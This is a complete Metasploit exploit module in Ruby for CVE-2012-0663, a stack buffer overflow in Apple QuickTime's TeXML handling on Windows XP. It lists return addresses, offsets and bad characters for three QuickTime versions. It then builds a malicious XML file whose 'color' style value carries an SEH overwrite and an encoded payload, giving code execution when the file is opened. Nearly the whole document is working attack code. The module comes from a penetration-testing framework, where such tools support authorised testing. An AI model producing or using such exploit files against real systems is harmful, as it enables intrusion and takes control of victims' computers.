## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. The flaw is generally known as a bug while processing the 'transform' attribute, however, that attack vector seems to only cause a TerminateProcess call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the 'color' value instead, which accomplishes the same thing. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability Discovery 'sinn3r', # Metasploit Module 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'OSVDB', '81934' ], [ 'CVE', '2012-0663' ], [ 'BID', '53571' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ], [ 'URL', 'http://support.apple.com/kb/HT1222' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => "\x00\x23\x25\x3c\x3e\x7d" }, 'Platform' => 'win', 'Targets' => [ [ 'QuickTime 7.7.1 on Windows XP SP3', { 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.7.0 on Windows XP SP3', { 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.6.9 on Windows XP SP3', { 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9) 'Offset' => 643, 'Max' => 13508 } ], ], 'Privileged' => false, 'DisclosureDate' => 'May 15 2012')) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']), ], self.class) end def exploit my_payload = rand_text(target['Offset']) my_payload << generate_seh_record(target.ret) my_payload << payload.encoded my_payload << rand_text(target['Max'] - my_payload.length) texml = <<-eos <?xml version="1.0"?> <?quicktime type="application/x-quicktime-texml"?> <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1" language="eng" timeScale="600" transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)"> <sample duration="2400" keyframe="true"> <description format="tx3g" displayFlags="ScrollIn" horizontalJustification="Left" verticalJustification="Top" backgroundColor="0%, 0%, 0%, 100%"> <defaultTextBox x="0" y="0" width="176" height="60"/> <fontTable> <font id="1" name="Times"/> </fontTable> <sharedStyles> <style id="1"> {font-table: 1} {font-size: 10} {font-style:normal} {font-weight: normal} {color: #{my_payload}%, 100%, 100%, 100%} </style> </sharedStyles> </description> <sampleData scrollDelay="200" highlightColor="25%, 45%, 65%, 100%" targetEncoding="utf8"> <textBox x="10" y="10" width="156" height="40"/> <text styleID="1">What you need... Metasploit!</text> <highlight startMarker="1" endMarker="2"/> <blink startMarker="3" endMarker="4"/> </sampleData> </sample> </text3GTrack> eos texml = texml.gsub(/^\t\t/,'') print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) end end